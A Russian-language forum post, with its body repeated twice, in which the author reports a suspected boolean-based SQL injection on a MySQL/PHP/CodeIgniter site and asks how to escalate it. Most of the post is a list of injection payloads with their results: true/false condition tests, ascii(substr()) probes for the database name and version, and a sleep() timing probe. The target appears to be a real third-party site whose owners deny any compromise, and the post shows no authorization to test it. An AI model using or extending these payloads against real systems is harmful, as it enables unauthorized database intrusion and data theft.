Всем привет.
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет
add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет
При попытки добавить запросы выбивает ошибку 500:
add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500
Wappalyzer показывает:
Mysql, php, CodeIgniter
Есть возможность раскрутить? Может мне надо обратить на что то внимания?
Нашел вроде Sql Inection BOOLEN BASED, но пишут что у них везде проверки и в их базу нечего внедрено не было.
Запросы:
add' -- - Работает
add' AND 2*3*8=6*8 AND '000mW7b'!='000mW7b% - Информация есть
add' AND 1*3*8=6*8 AND '000mW7b'!='000mW7b% - Нет
add' AND '1'='1 - Инормация есть
add' AND '1'='2 - Нет
При попытки добавить запросы выбивает ошибку 500:
add' AND (ascii(substr((select database()),1,1))) > 100 AND '000mW7b'!='000mW7b% - Ошибка 500
add' AND (ascii(substring(version(),2,1)))=56-- - - Ошибка 500
aa' and sleep(4) and '1'='1 - Ошибка 500
Wappalyzer показывает:
Mysql, php, CodeIgniter
Есть возможность раскрутить? Может мне надо обратить на что то внимания?
